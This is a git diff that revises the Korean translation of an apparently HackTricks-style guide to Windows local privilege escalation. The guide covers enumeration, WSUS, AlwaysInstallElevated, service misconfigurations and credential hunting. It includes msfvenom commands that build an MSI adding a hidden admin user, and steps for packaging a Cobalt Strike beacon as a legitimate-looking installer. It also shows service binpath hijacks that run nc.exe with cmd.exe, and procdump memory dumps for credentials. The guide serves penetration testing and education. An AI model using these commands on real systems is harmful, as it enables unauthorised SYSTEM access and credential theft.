diff --git a/src/windows-hardening/windows-local-privilege-escalation/README.md b/src/windows-hardening/windows-local-privilege-escalation/README.md index c00ae36eb..64849b170 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/README.md +++ b/src/windows-hardening/windows-local-privilege-escalation/README.md @@ -8,7 +8,7 @@ ### Access Tokens -**Windows Access Tokens가 무엇인지 모른다면, 계속하기 전에 다음 페이지를 읽으세요:** +**Windows Access Tokens가 무엇인지 모르는 경우 계속하기 전에 다음 페이지를 읽으세요:** {{#ref}} @@ -26,27 +26,27 @@ acls-dacls-sacls-aces.md ### Integrity Levels -**Windows의 integrity levels가 무엇인지 모른다면, 계속하기 전에 다음 페이지를 읽으세요:** +**Windows의 integrity levels가 무엇인지 모르면 계속하기 전에 다음 페이지를 읽으세요:** {{#ref}} integrity-levels.md {{#endref}} -## Windows Security Controls +## Windows 보안 제어 -Windows에는 시스템을 열거하지 못하게 하거나, 실행 파일 실행을 차단하거나, 심지어 활동을 탐지할 수 있는 여러 요소가 있습니다. privilege escalation enumeration을 시작하기 전에 다음 페이지를 읽고 이러한 방어 메커니즘을 모두 열거하세요: +Windows에는 시스템을 **prevent you from enumerating the system**, 실행 파일을 실행하거나 심지어 활동을 **detect your activities**할 수 있는 다양한 요소가 있습니다. privilege escalation enumeration을 시작하기 전에 다음 **page**를 **read**하고 이러한 모든 **defenses** **mechanisms**를 **enumerate**하세요: {{#ref}} ../authentication-credentials-uac-and-efs/ {{#endref}} -## System Info +## 시스템 정보 -### 버전 정보 열거 +### Version info enumeration -Windows 버전에 알려진 취약점이 있는지 확인하세요(적용된 패치도 확인하세요). +Windows 버전에 알려진 취약점이 있는지 확인하세요 (적용된 패치도 확인하세요). ```bash systeminfo systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information @@ -61,16 +61,16 @@ Get-Hotfix -description "Security update" #List only "Security Update" patches ``` ### Version Exploits -이 [site](https://msrc.microsoft.com/update-guide/vulnerability)는 Microsoft 보안 취약점에 대한 자세한 정보를 검색하는 데 유용합니다. 이 데이터베이스에는 4,700개가 넘는 보안 취약점이 등록되어 있어 Windows 환경이 제공하는 **massive attack surface**를 보여줍니다. +This [site](https://msrc.microsoft.com/update-guide/vulnerability)는 Microsoft 보안 취약점에 대한 자세한 정보를 검색하는 데 유용합니다. 이 데이터베이스에는 4,700개 이상의 보안 취약점이 등록되어 있어 Windows 환경이 제공하는 **거대한 공격 표면**을 보여줍니다. -**On the system** +**시스템에서** - _post/windows/gather/enum_patches_ - _post/multi/recon/local_exploit_suggester_ - [_watson_](https://github.com/rasta-mouse/Watson) -- [_winpeas_](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) _(Winpeas에는 watson이 포함되어 있음)_ +- [_winpeas_](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) _(Winpeas has watson embedded)_ -**로컬에서 시스템 정보 사용** +**시스템 정보로 로컬에서** - [https://github.com/AonCyberLabs/Windows-Exploit-Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) - [https://github.com/bitsadmin/wesng](https://github.com/bitsadmin/wesng) @@ -83,7 +83,7 @@ Get-Hotfix -description "Security update" #List only "Security Update" patches ### 환경 -env variables에 저장된 credential/Juicy 정보가 있나요? +자격 증명/Juicy 정보가 env variables에 저장되어 있나요? ```bash set dir env: @@ -99,9 +99,9 @@ type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.tx cat (Get-PSReadlineOption).HistorySavePath cat (Get-PSReadlineOption).HistorySavePath | sls passw ``` -### PowerShell Transcript files +### PowerShell 전사 파일 -이를 켜는 방법은 [https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/](https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/)에서 확인할 수 있습니다. +이를 활성화하는 방법은 [https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/](https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/) ```bash #Check is enable in the registry reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription @@ -116,30 +116,30 @@ Stop-Transcript ``` ### PowerShell Module Logging -PowerShell 파이프라인 실행의 세부사항이 기록되며, 실행된 명령, 명령 호출 및 스크립트의 일부가 포함됩니다. 다만 전체 실행 세부정보와 출력 결과는 모두 캡처되지 않을 수 있습니다. +PowerShell 파이프라인 실행에 대한 세부 정보가 기록되며, 실행된 명령, 명령 호출 및 스크립트의 일부가 포함됩니다. 다만 전체 실행 세부 정보와 출력 결과가 모두 캡처되지 않을 수 있습니다. -이를 활성화하려면 문서의 "Transcript files" 섹션에 있는 지침을 따르되, **"Module Logging"**을 선택하고 **"Powershell Transcription"** 대신 사용하세요. +이를 활성화하려면 문서의 "Transcript files" 섹션에 있는 지침을 따르고 **"Module Logging"**을 **"Powershell Transcription"** 대신 선택하세요. ```bash reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging ``` -PowersShell 로그의 마지막 15개 이벤트를 보려면 다음을 실행하세요: +PowersShell 로그에서 마지막 15개 이벤트를 보려면 다음을 실행할 수 있습니다: ```bash Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView ``` ### PowerShell **Script Block Logging** -스크립트 실행의 모든 활동과 전체 내용이 기록되어 각 코드 블록이 실행되는 동안 그 내용이 문서화됩니다. 이 과정은 각 활동에 대한 포괄적인 감사 추적을 보존하며, forensics 및 악성 행위 분석에 유용합니다. 실행 시점에 모든 활동을 문서화함으로써 프로세스에 대한 자세한 통찰을 제공합니다. +스크립트 실행의 모든 활동과 전체 내용이 캡처되어 코드의 각 블록이 실행되는 대로 문서화됩니다. 이 과정은 각 활동의 포괄적인 감사 기록을 보존하여 포렌식 및 악성 행위 분석에 유용합니다. 실행 시점에 모든 활동을 문서화함으로써 프로세스에 대한 상세한 통찰을 제공합니다. ```bash reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging ``` -Script Block에 대한 로깅 이벤트는 Windows 이벤트 뷰어에서 다음 경로에서 확인할 수 있습니다: **Application and Services Logs > Microsoft > Windows > PowerShell > Operational**.\ -마지막 20개의 이벤트를 보려면 다음을 사용할 수 있습니다: +Script Block의 로깅 이벤트는 Windows 이벤트 뷰어의 다음 경로에서 확인할 수 있습니다: **Application and Services Logs > Microsoft > Windows > PowerShell > Operational**.\ +최근 20개의 이벤트를 보려면 다음을 사용할 수 있습니다: ```bash Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview ``` @@ -156,17 +156,17 @@ Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ``` ## WSUS -업데이트가 http**S**가 아닌 http로 요청되는 경우 시스템을 compromise할 수 있습니다. +업데이트가 http**S**가 아니라 http로 요청되는 경우 시스템을 침해할 수 있습니다. -다음 명령을 cmd에서 실행하여 네트워크가 non-SSL WSUS 업데이트를 사용하는지 확인합니다: +먼저 cmd에서 다음을 실행하여 네트워크가 SSL을 사용하지 않는 WSUS 업데이트를 사용하는지 확인합니다: ``` reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer ``` -또는 PowerShell에서 다음을 실행: +또는 PowerShell에서 다음: ``` Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer" ``` -다음과 같은 응답을 받는다면: +다음과 같은 응답을 받으면: ```bash HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate WUServer REG_SZ http://xxxx-updxx.corp.internal.com:8535 @@ -182,7 +182,7 @@ PSProvider : Microsoft.PowerShell.Core\Registry ``` And if `HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer` or `Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver"` is equals to `1`. -Then, **취약하게 이용할 수 있습니다.** If the last registry is equals to 0, then, the WSUS entry will be ignored. +Then, **it is exploitable.** If the last registry is equals to 0, then, the WSUS entry will be ignored. In orther to exploit this vulnerabilities you can use tools like: [Wsuxploit](https://github.com/pimps/wsuxploit), [pyWSUS ](https://github.com/GoSecure/pywsus)- These are MiTM weaponized exploits scripts to inject 'fake' updates into non-SSL WSUS traffic. @@ -197,15 +197,15 @@ CTX_WSUSpect_White_Paper (1).pdf [**Read the complete report here**](https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/).\ Basically, this is the flaw that this bug exploits: -> If we have the power to modify our local user proxy, and Windows Updates uses the proxy configured in Internet Explorer’s settings, we therefore have the power to run [PyWSUS](https://github.com/GoSecure/pywsus) locally to intercept our own traffic and run code as an elevated user on our asset. +> 만약 로컬 유저 프록시를 수정할 수 있는 권한이 있고, Windows Updates가 Internet Explorer의 설정에 구성된 프록시를 사용한다면, 로컬에서 [PyWSUS](https://github.com/GoSecure/pywsus)를 실행해 자신의 트래픽을 가로채고 자산에서 권한 상승된 사용자로 코드를 실행할 수 있는 권한을 가지게 된다. > -> Furthermore, since the WSUS service uses the current user’s settings, it will also use its certificate store. If we generate a self-signed certificate for the WSUS hostname and add this certificate into the current user’s certificate store, we will be able to intercept both HTTP and HTTPS WSUS traffic. WSUS uses no HSTS-like mechanisms to implement a trust-on-first-use type validation on the certificate. If the certificate presented is trusted by the user and has the correct hostname, it will be accepted by the service. +> 또한 WSUS 서비스는 현재 사용자의 설정을 사용하므로 사용자 인증서 저장소도 사용한다. WSUS 호스트명에 대한 self-signed 인증서를 생성하고 이를 현재 사용자의 인증서 저장소에 추가하면 HTTP 및 HTTPS WSUS 트래픽을 모두 가로챌 수 있다. WSUS는 인증서에 대해 HSTS와 유사한 메커니즘을 사용하지 않아 trust-on-first-use 유형의 검증을 구현하지 않는다. 제시된 인증서가 사용자에게 신뢰되고 올바른 호스트명을 가지면 서비스는 이를 수락한다. -이 취약점은 도구 [**WSUSpicious**](https://github.com/GoSecure/wsuspicious)를 사용하여 악용할 수 있습니다 (도구가 공개되면). +You can exploit this vulnerability using the tool [**WSUSpicious**](https://github.com/GoSecure/wsuspicious) (once it's liberated). ## Third-Party Auto-Updaters and Agent IPC (local privesc) -많은 엔터프라이즈 에이전트는 localhost IPC surface와 권한 있는 업데이트 채널을 노출합니다. enrollment를 공격자 서버로 강제할 수 있고 updater가 rogue root CA를 신뢰하거나 서명 검증이 약하면, 로컬 사용자는 SYSTEM 서비스가 설치하는 악성 MSI를 전달할 수 있습니다. See a generalized technique (based on the Netskope stAgentSvc chain – CVE-2025-0309) here: +Many enterprise agents expose a localhost IPC surface and a privileged update channel. If enrollment can be coerced to an attacker server and the updater trusts a rogue root CA or weak signer checks, a local user can deliver a malicious MSI that the SYSTEM service installs. See a generalized technique (based on the Netskope stAgentSvc chain – CVE-2025-0309) here: {{#ref}} @@ -222,7 +222,7 @@ For more information about the flow of the attack check [https://research.nccgro ## AlwaysInstallElevated -**만약** 이 2개의 레지스트리 항목이 **활성화되어** (값이 **0x1**) 있다면, 모든 권한의 사용자는 `*.msi` 파일을 NT AUTHORITY\\**SYSTEM**로 **설치**(실행)할 수 있습니다. +**If** these 2 registers are **enabled** (value is **0x1**), then users of any privilege can **install** (execute) `*.msi` files as NT AUTHORITY\\**SYSTEM**. ```bash reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated @@ -232,46 +232,44 @@ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallEle msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted ``` -meterpreter 세션이 있다면 이 기술을 모듈 **`exploit/windows/local/always_install_elevated`**로 자동화할 수 있습니다. +If you have a meterpreter session you can automate this technique using the module **`exploit/windows/local/always_install_elevated`** ### PowerUP -power-up의 `Write-UserAddMSI` 명령을 사용해 현재 디렉터리에 권한 상승용 Windows MSI 바이너리를 생성하세요. 이 스크립트는 사용자/그룹 추가를 묻는 사전 컴파일된 MSI 설치 파일을 작성합니다(따라서 GIU access가 필요합니다): +`Write-UserAddMSI` 명령을 power-up에서 사용하여 현재 디렉토리 안에 권한 상승을 위한 Windows MSI 바이너리를 생성할 수 있습니다. 이 스크립트는 사용자/그룹 추가를 요청하는 미리 컴파일된 MSI 설치 프로그램을 작성합니다(따라서 GIU 접근이 필요합니다): ``` Write-UserAddMSI ``` -생성된 바이너리를 실행하면 권한 상승이 가능합니다. +생성된 바이너리를 실행하기만 하면 권한을 상승시킬 수 있습니다. ### MSI Wrapper -이 튜토리얼을 읽어 MSI 래퍼를 만드는 방법을 배우세요. **.bat** 파일은 **그냥** **명령줄**을 **실행**하려는 경우 래핑할 수 있습니다. - +이 튜토리얼을 읽어 MSI Wrapper를 만드는 방법을 배우세요. **.bat** 파일을 래핑할 수 있다는 점을 유의하세요 — 만약 **단순히** **명령줄**을 **실행**하려는 경우에만 유용합니다. {{#ref}} msi-wrapper.md {{#endref}} -### WIX로 MSI 생성 - +### WIX로 MSI 만들기 {{#ref}} create-msi-with-wix.md {{#endref}} -### Visual Studio로 MSI 생성 +### Visual Studio로 MSI 만들기 -- Cobalt Strike 또는 Metasploit으로 `C:\privesc\beacon.exe` 경로에 **새 Windows EXE TCP payload**를 생성합니다. -- Visual Studio를 열고, Create a new project를 선택한 다음 검색창에 "installer"를 입력하세요. Setup Wizard 프로젝트를 선택하고 Next를 클릭합니다. -- 프로젝트 이름을 **AlwaysPrivesc**와 같이 지정하고, 위치는 **`C:\privesc`**로 설정한 다음 **place solution and project in the same directory**를 선택하고 **Create**를 클릭합니다. -- Next를 계속 클릭하여 4단계 중 3단계(choose files to include)로 이동합니다. **Add**를 클릭하고 방금 생성한 Beacon payload를 선택한 다음 **Finish**를 클릭합니다. -- **Solution Explorer**에서 **AlwaysPrivesc** 프로젝트를 선택하고 **Properties**에서 **TargetPlatform**을 **x86**에서 **x64**로 변경합니다. -- Author 및 Manufacturer와 같은 다른 속성도 변경할 수 있으며, 이를 통해 설치된 앱이 더 합법적으로 보이게 할 수 있습니다. +- Cobalt Strike 또는 Metasploit으로 `C:\privesc\beacon.exe`에 저장할 **새로운 Windows EXE TCP payload**를 **생성**합니다. +- **Visual Studio**를 열고 **Create a new project**를 선택한 다음 검색 상자에 "installer"를 입력합니다. **Setup Wizard** 프로젝트를 선택하고 **Next**를 클릭합니다. +- 프로젝트 이름을 **AlwaysPrivesc**와 같이 지정하고 위치는 **`C:\privesc`**로 설정합니다. **place solution and project in the same directory**를 선택하고 **Create**를 클릭합니다. +- 계속해서 **Next**를 클릭하여 4단계 중 3단계(포함할 파일 선택)까지 진행합니다. **Add**를 클릭하고 방금 생성한 Beacon 페이로드를 선택한 다음 **Finish**를 클릭합니다. +- **Solution Explorer**에서 **AlwaysPrivesc** 프로젝트를 선택한 뒤 **Properties**에서 **TargetPlatform**을 **x86**에서 **x64**로 변경합니다. +- 설치된 앱을 더 정당하게 보이게 하기 위해 **Author**나 **Manufacturer** 같은 다른 속성들도 변경할 수 있습니다. - 프로젝트를 우클릭하고 **View > Custom Actions**를 선택합니다. - **Install**을 우클릭하고 **Add Custom Action**을 선택합니다. -- **Application Folder**를 더블클릭하고 **beacon.exe** 파일을 선택한 후 **OK**를 클릭합니다. 이렇게 하면 설치 프로그램이 실행되면 즉시 beacon payload가 실행되도록 보장됩니다. +- **Application Folder**를 더블클릭하고 **beacon.exe** 파일을 선택한 뒤 **OK**를 클릭합니다. 이렇게 하면 설치 프로그램이 실행될 때 즉시 Beacon 페이로드가 실행됩니다. - **Custom Action Properties**에서 **Run64Bit**를 **True**로 변경합니다. -- 마지막으로 빌드합니다. -- 경고 `File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86'`가 표시되면 플랫폼을 x64로 설정했는지 확인하세요. +- 마지막으로 **빌드**합니다. +- `File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86'` 경고가 표시되면 플랫폼을 x64로 설정했는지 확인하세요. ### MSI 설치 @@ -281,23 +279,23 @@ msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi ``` 이 취약점을 악용하려면 다음을 사용할 수 있습니다: _exploit/windows/local/always_install_elevated_ -## 안티바이러스 및 탐지기 +## Antivirus and Detectors -### 감사 설정 +### Audit Settings -이 설정들은 무엇이 **로그로 기록되는지**를 결정하므로, 주의해야 합니다. +이 설정들은 무엇이 **logged** 되는지를 결정하므로 주의해야 합니다. ``` reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit ``` ### WEF -Windows Event Forwarding의 경우 로그가 어디로 전송되는지 아는 것은 흥미롭습니다. +Windows Event Forwarding는 로그가 어디로 전송되는지 아는 것이 흥미롭다 ```bash reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager ``` ### LAPS -**LAPS**는 도메인에 가입된 컴퓨터에서 **local Administrator passwords**의 **management**를 위해 설계되었으며, 각 비밀번호가 **unique, randomised, and regularly updated**되도록 보장합니다. 이러한 비밀번호는 Active Directory에 안전하게 저장되며, ACLs를 통해 충분한 권한이 부여된 사용자만 접근하여 승인된 경우 local admin passwords를 볼 수 있습니다. +**LAPS**는 도메인에 가입된 컴퓨터의 로컬 Administrator 비밀번호 관리를 위해 설계되었으며, 각 비밀번호가 고유하고 무작위로 생성되며 정기적으로 갱신되도록 보장합니다. 이러한 비밀번호는 Active Directory에 안전하게 저장되며, ACLs를 통해 충분한 권한이 부여된 사용자만 접근하여 권한이 있을 경우 로컬 admin 비밀번호를 확인할 수 있습니다. {{#ref}} @@ -306,26 +304,27 @@ reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\Subs ### WDigest -활성화되어 있으면, **plain-text passwords are stored in LSASS** (Local Security Authority Subsystem Service).\ +활성화된 경우, **평문 비밀번호가 LSASS에 저장됩니다** (Local Security Authority Subsystem Service).\ [**More info about WDigest in this page**](../stealing-credentials/credentials-protections.md#wdigest). ```bash reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential ``` ### LSA Protection -**Windows 8.1**부터 Microsoft는 Local Security Authority (LSA)에 대한 보호를 강화하여 신뢰할 수 없는 프로세스가 메모리를 **읽으려 하거나** 코드를 주입하려는 시도를 **차단**함으로써 시스템 보안을 강화했습니다.\\ [**More info about LSA Protection here**](../stealing-credentials/credentials-protections.md#lsa-protection). +**Windows 8.1**부터 Microsoft는 Local Security Authority (LSA)에 대해 신뢰되지 않은 프로세스가 **메모리를 읽거나** 코드를 주입하려는 시도를 **차단**하는 향상된 보호를 도입하여 시스템을 더욱 안전하게 했습니다.\ +[**More info about LSA Protection here**](../stealing-credentials/credentials-protections.md#lsa-protection). ```bash reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL ``` ### Credentials Guard -**Credential Guard**은 **Windows 10**에 도입되었습니다. 그 목적은 장치에 저장된 credentials를 pass-the-hash 공격과 같은 위협으로부터 보호하는 것입니다.| [**More info about Credentials Guard here.**](../stealing-credentials/credentials-protections.md#credential-guard) +**Credential Guard**는 **Windows 10**에 도입되었습니다. 그 목적은 기기에 저장된 자격 증명을 pass-the-hash 공격과 같은 위협으로부터 보호하는 것입니다.| [**More info about Credentials Guard here.**](../stealing-credentials/credentials-protections.md#credential-guard) ```bash reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags ``` -### 캐시된 자격 증명 +### Cached Credentials -**Domain credentials**는 **Local Security Authority** (LSA)에 의해 인증되며 운영 체제 구성 요소에서 사용됩니다. 사용자의 로그온 데이터가 등록된 보안 패키지에 의해 인증되면, 일반적으로 해당 사용자에 대한 도메인 자격 증명이 설정됩니다.\ +**Domain credentials**는 **Local Security Authority** (LSA)에 의해 인증되며 운영 체제 구성 요소에서 사용됩니다. 사용자의 로그온 데이터가 등록된 보안 패키지에 의해 인증되면 일반적으로 해당 사용자의 domain credentials가 생성됩니다.\ [**More info about Cached Credentials here**](../stealing-credentials/credentials-protections.md#cached-credentials). ```bash reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT @@ -334,7 +333,7 @@ reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLO ### 사용자 및 그룹 열거 -자신이 속한 그룹 중 주목할 만한 권한을 가진 것이 있는지 확인해야 합니다. +자신이 속한 그룹 중 흥미로운 권한을 가진 그룹이 있는지 확인해야 합니다. ```bash # CMD net users %username% #Me @@ -351,17 +350,17 @@ Get-LocalGroupMember Administrators | ft Name, PrincipalSource ``` ### 특권 그룹 -만약 여러분이 **어떤 특권 그룹에 속해 있다면 권한을 상승시킬 수 있습니다**. 특권 그룹과 이를 악용해 권한을 상승시키는 방법은 여기에서 확인하세요: +만약 당신이 **어떤 특권 그룹에 속해 있다면 권한을 상승시킬 수 있습니다**. 특권 그룹과 이를 악용해 권한을 상승시키는 방법은 다음에서 확인하세요: {{#ref}} ../active-directory-methodology/privileged-groups-and-token-privileges.md {{#endref}} -### 토큰 조작 +### Token 조작 -**자세히 알아보기**: 이 페이지에서 **token**이 무엇인지 확인하세요: [**Windows Tokens**](../authentication-credentials-uac-and-efs/index.html#access-tokens).\ -다음 페이지를 확인하여 **흥미로운 tokens에 대해 배우고** 이를 악용하는 방법을 알아보세요: +**자세히 알아보기** 이 페이지에서 **token**이 무엇인지: [**Windows Tokens**](../authentication-credentials-uac-and-efs/index.html#access-tokens).\ +다음 페이지를 확인하여 **interesting tokens**에 대해 배우고 이를 악용하는 방법을 알아보세요: {{#ref}} @@ -378,7 +377,7 @@ klist sessions dir C:\Users Get-ChildItem C:\Users ``` -### 암호 정책 +### 비밀번호 정책 ```bash net accounts ``` @@ -390,8 +389,8 @@ powershell -command "Get-Clipboard" ### 파일 및 폴더 권한 -무엇보다도, 프로세스를 나열할 때 **프로세스의 명령줄에 비밀번호가 포함되어 있는지 확인하세요**.\ -실행 중인 바이너리를 **덮어쓸 수 있는지** 또는 바이너리 폴더에 쓰기 권한이 있어 잠재적인 [**DLL Hijacking attacks**](dll-hijacking/index.html)를 악용할 수 있는지 확인하세요: +무엇보다도, 프로세스를 나열할 때 **프로세스의 명령줄에 비밀번호가 있는지 확인하세요**.\\ +**실행 중인 일부 바이너리를 덮어쓸 수 있는지** 또는 바이너리 폴더에 쓰기 권한이 있어 가능한 [**DLL Hijacking attacks**](dll-hijacking/index.html)를 악용할 수 있는지 확인하세요: ```bash Tasklist /SVC #List processes running and services tasklist /v /fi "username eq system" #Filter "system" processes @@ -402,9 +401,9 @@ Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "sv #Without usernames Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id ``` -항상 [**electron/cef/chromium debuggers**가 실행 중인지 확인하세요, 이를 악용해 권한을 상승시킬 수 있습니다](../../linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md). +항상 가능한 [**electron/cef/chromium debuggers** running, you could abuse it to escalate privileges](../../linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md)을 확인하세요. -**프로세스 바이너리의 권한 확인** +**processes binaries의 권한 확인** ```bash for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do ( for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do ( @@ -421,9 +420,9 @@ icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone todos %username%" && echo. ) ``` -### Memory Password mining +### 메모리 비밀번호 추출 -sysinternals의 **procdump**를 사용하여 실행 중인 프로세스의 메모리 덤프를 생성할 수 있습니다. FTP와 같은 서비스는 메모리에 **credentials in clear text in memory**를 가지고 있는 경우가 있으니, 메모리를 덤프해서 credentials를 읽어보세요. +실행 중인 프로세스의 메모리 덤프는 sysinternals의 **procdump**를 사용해 만들 수 있습니다. Services like FTP have the **credentials in clear text in memory**, 메모리 덤프를 떠서 해당 credentials를 읽어보세요. ```bash procdump.exe -accepteula -ma ``` @@ -431,7 +430,7 @@ procdump.exe -accepteula -ma **SYSTEM 권한으로 실행되는 애플리케이션은 사용자가 CMD를 실행하거나 디렉터리를 탐색할 수 있게 허용할 수 있습니다.** -예: "Windows Help and Support" (Windows + F1)에서 "command prompt"를 검색하고 "Click to open Command Prompt"를 클릭합니다 +예: "Windows Help and Support" (Windows + F1)에서 "command prompt"를 검색하고, "Click to open Command Prompt"를 클릭하세요. ## 서비스 @@ -448,7 +447,7 @@ Get-Service ```bash sc qc ``` -각 서비스에 필요한 권한 수준을 확인하기 위해 _Sysinternals_의 이진 파일 **accesschk**를 갖추는 것이 권장됩니다. +각 서비스에 필요한 권한 수준을 확인하려면 _Sysinternals_의 바이너리 **accesschk**를 사용하는 것이 권장됩니다. ```bash accesschk.exe -ucqv #Check rights for different groups ``` @@ -459,14 +458,14 @@ accesschk.exe -uwcqv %USERNAME% * /accepteula accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version ``` -[XP용 accesschk.exe는 여기에서 다운로드할 수 있습니다](https://github.com/ankh2054/windows-pentest/raw/master/Privelege/accesschk-2003-xp.exe) +[You can download accesschk.exe for XP for here](https://github.com/ankh2054/windows-pentest/raw/master/Privelege/accesschk-2003-xp.exe) ### 서비스 활성화 -다음 오류가 발생하는 경우(예: SSDPSRV): +다음과 같은 오류가 발생하는 경우(예: SSDPSRV): -_시스템 오류 1058이(가) 발생했습니다._\ -_서비스가 사용 중지되어 있거나 연결된 활성화된 장치가 없기 때문에 시작할 수 없습니다._ +_System error 1058 has occurred._\ +_The service cannot be started, either because it is disabled or because it has no enabled devices associated with it._ 다음 명령으로 활성화할 수 있습니다 ```bash @@ -475,13 +474,13 @@ sc config SSDPSRV obj= ".\LocalSystem" password= "" ``` **서비스 upnphost가 작동하려면 SSDPSRV에 의존한다는 점을 고려하세요 (XP SP1의 경우)** -이 문제에 대한 **또 다른 해결책**은 다음을 실행하는 것입니다: +**또 다른 우회 방법**은 다음을 실행하는 것입니다: ``` sc.exe config usosvc start= auto ``` -### **서비스 바이너리 경로 수정** +### **Modify service binary path** -해당 서비스에 대해 "Authenticated users" 그룹이 **SERVICE_ALL_ACCESS** 권한을 가진 시나리오에서는 서비스의 실행 바이너리를 수정할 수 있습니다. 수정 및 실행을 위해 **sc**: +서비스에서 "Authenticated users" 그룹이 **SERVICE_ALL_ACCESS** 권한을 가지고 있는 경우, 해당 서비스의 실행 파일 바이너리를 수정할 수 있습니다. **sc**를 사용하여 수정하고 실행하려면: ```bash sc config binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe" sc config binpath= "net localgroup administrators username /add" @@ -494,20 +493,20 @@ sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe" wmic service NAMEOFSERVICE call startservice net stop [service name] && net start [service name] ``` -권한은 다양한 권한을 통해 상승될 수 있습니다: +권한 상승은 다음과 같은 권한을 통해 이루어질 수 있습니다: -- **SERVICE_CHANGE_CONFIG**: 서비스 바이너리의 재구성을 허용합니다. -- **WRITE_DAC**: 권한 재구성을 허용하여 서비스 구성을 변경할 수 있게 합니다. -- **WRITE_OWNER**: 소유권 획득 및 권한 재구성을 허용합니다. -- **GENERIC_WRITE**: 서비스 구성을 변경하는 권한을 포함합니다. -- **GENERIC_ALL**: 마찬가지로 서비스 구성을 변경할 수 있는 권한을 포함합니다. +- **SERVICE_CHANGE_CONFIG**: 서비스 바이너리를 재구성할 수 있습니다. +- **WRITE_DAC**: 권한 재구성을 가능하게 하여 서비스 구성 변경이 가능해집니다. +- **WRITE_OWNER**: 소유권 취득 및 권한 재구성이 허용됩니다. +- **GENERIC_WRITE**: 서비스 구성 변경 권한을 포함합니다. +- **GENERIC_ALL**: 마찬가지로 서비스 구성 변경 권한을 포함합니다. -이 취약점의 탐지 및 악용에는 _exploit/windows/local/service_permissions_을(를) 사용할 수 있습니다. +이 취약점의 탐지 및 악용을 위해 _exploit/windows/local/service_permissions_ 를 사용할 수 있습니다. -### 서비스 바이너리의 약한 권한 +### Services binaries weak permissions -**서비스에 의해 실행되는 바이너리를 수정할 수 있는지 확인하십시오** 또는 바이너리가 위치한 폴더에 **쓰기 권한이 있는지** 확인하십시오 ([**DLL Hijacking**](dll-hijacking/index.html)). -서비스에 의해 실행되는 모든 바이너리는 **wmic**(system32가 아닌 위치)를 사용하여 얻을 수 있고, 권한은 **icacls**로 확인할 수 있습니다: +**서비스에서 실행되는 바이너리를 수정할 수 있는지 확인하십시오** 또는 바이너리가 위치한 폴더에 **쓰기 권한이 있는지 확인**하십시오 ([**DLL 